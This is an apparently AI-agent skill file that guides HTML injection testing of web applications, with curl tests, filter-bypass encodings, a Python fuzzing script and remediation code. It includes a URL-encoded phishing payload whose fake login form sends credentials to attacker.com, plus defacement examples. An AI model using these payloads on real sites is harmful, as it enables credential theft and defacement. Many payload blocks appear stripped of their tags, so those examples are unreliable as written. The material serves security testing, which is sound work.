---
name: HTML Injection Testing
description: This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". It provides comprehensive HTML injection attack techniques and testing methodologies.
version: 1.0.0
tags: [html-injection, web-security, injection, penetration-testing, content-injection]
---
# HTML Injection Testing
## Purpose
Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.
## Prerequisites
### Required Tools
- Web browser with developer tools
- Burp Suite or OWASP ZAP
- Tamper Data or similar proxy
- cURL for testing payloads
### Required Knowledge
- HTML fundamentals
- HTTP request/response structure
- Web application input handling
- Difference between HTML injection and XSS
## Outputs and Deliverables
1. **Vulnerability Report** - Identified injection points
2. **Exploitation Proof** - Demonstrated content manipulation
3. **Impact Assessment** - Potential phishing and defacement risks
4. **Remediation Guidance** - Input validation recommendations
## Core Workflow
### Phase 1: Understanding HTML Injection
HTML injection occurs when user input is reflected in web pages without proper sanitization:
```html
Welcome,
?name=Injected Content
Welcome,
Injected Content
```
Key differences from XSS:
- HTML injection: Only HTML tags are rendered
- XSS: JavaScript code is executed
- HTML injection is often stepping stone to XSS
Attack goals:
- Modify website appearance (defacement)
- Create fake login forms (phishing)
- Inject malicious links
- Display misleading content
### Phase 2: Identifying Injection Points
Map application for potential injection surfaces:
```
1. Search bars and search results
2. Comment sections
3. User profile fields
4. Contact forms and feedback
5. Registration forms
6. URL parameters reflected on page
7. Error messages
8. Page titles and headers
9. Hidden form fields
10. Cookie values reflected on page
```
Common vulnerable parameters:
```
?name=
?user=
?search=
?query=
?message=
?title=
?content=
?redirect=
?url=
?page=
```
### Phase 3: Basic HTML Injection Testing
Test with simple HTML tags:
```html
Test Injection
Bold Text
Italic Text
Underlined Text
Red Text
Injected DIV
Injected paragraph
Line breaks
Click Here
Legitimate Link
```
Testing workflow:
```bash
# Test basic injection
curl "http://target.com/search?q=Test
"
# Check if HTML renders in response
curl -s "http://target.com/search?q=Bold" | grep -i "bold"
# Test in URL-encoded form
curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"
```
### Phase 4: Types of HTML Injection
#### Stored HTML Injection
Payload persists in database:
```html
Name: John Doe
Bio:
Great article!
```
#### Reflected GET Injection
Payload in URL parameters:
```html
http://target.com/welcome?name=Welcome%20Admin
http://target.com/search?q=
```
#### Reflected POST Injection
Payload in POST data:
```bash
# POST injection test
curl -X POST -d "comment=Malicious Content
" \
http://target.com/submit
# Form field injection
curl -X POST -d "name=&email=test@test.com" \
http://target.com/register
```
#### URL-Based Injection
Inject into displayed URLs:
```html
http://target.com/page/Injected
http://target.com/users//profile
```
### Phase 5: Phishing Attack Construction
Create convincing phishing forms:
```html
Session Expired
Your session has expired. Please log in again.
```
URL-encoded phishing link:
```
http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E
```
### Phase 6: Defacement Payloads
Website appearance manipulation:
```html
HACKED BY SECURITY TESTER
This site has been compromised
```
### Phase 7: Advanced Injection Techniques
#### CSS Injection
```html
Content
```
#### Meta Tag Injection
```html
```
#### Form Action Override
```html
```
#### iframe Injection
```html
```
### Phase 8: Bypass Techniques
Evade basic filters:
```html
Test
<h1>Encoded</h1>
%3Ch1%3EURL%20Encoded%3C%2Fh1%3E
Split Tag
Null Byte
%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E
\u003ch1\u003eUnicode\u003c/h1\u003e
Hover me
```
### Phase 9: Automated Testing
#### Using Burp Suite
```
1. Capture request with potential injection point
2. Send to Intruder
3. Mark parameter value as payload position
4. Load HTML injection wordlist
5. Start attack
6. Filter responses for rendered HTML
7. Manually verify successful injections
```
#### Using OWASP ZAP
```
1. Spider the target application
2. Active Scan with HTML injection rules
3. Review Alerts for injection findings
4. Validate findings manually
```
#### Custom Fuzzing Script
```python
#!/usr/bin/env python3
import requests
import urllib.parse
target = "http://target.com/search"
param = "q"
payloads = [
"Test
",
"Bold",
"",
"",
"Click",
"Styled
",
"",
"",
]
for payload in payloads:
encoded = urllib.parse.quote(payload)
url = f"{target}?{param}={encoded}"
try:
response = requests.get(url, timeout=5)
if payload.lower() in response.text.lower():
print(f"[+] Possible injection: {payload}")
elif "" in response.text or "" in response.text:
print(f"[?] Partial reflection: {payload}")
except Exception as e:
print(f"[-] Error: {e}")
```
### Phase 10: Prevention and Remediation
Secure coding practices:
```php
// PHP: Escape output
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
// PHP: Strip tags
echo strip_tags($user_input);
// PHP: Allow specific tags only
echo strip_tags($user_input, '
');
```
```python
# Python: HTML escape
from html import escape
safe_output = escape(user_input)
# Python Flask: Auto-escaping
{{ user_input }} # Jinja2 escapes by default
{{ user_input | safe }} # Marks as safe (dangerous!)
```
```javascript
// JavaScript: Text content (safe)
element.textContent = userInput;
// JavaScript: innerHTML (dangerous!)
element.innerHTML = userInput; // Vulnerable!
// JavaScript: Sanitize
const clean = DOMPurify.sanitize(userInput);
element.innerHTML = clean;
```
Server-side protections:
- Input validation (whitelist allowed characters)
- Output encoding (context-aware escaping)
- Content Security Policy (CSP) headers
- Web Application Firewall (WAF) rules
## Quick Reference
### Common Test Payloads
| Payload | Purpose |
|---------|---------|
| `Test
` | Basic rendering test |
| `Bold` | Simple formatting |
| `Link` | Link injection |
| `` | Image tag test |
| `
` | Style injection |
| `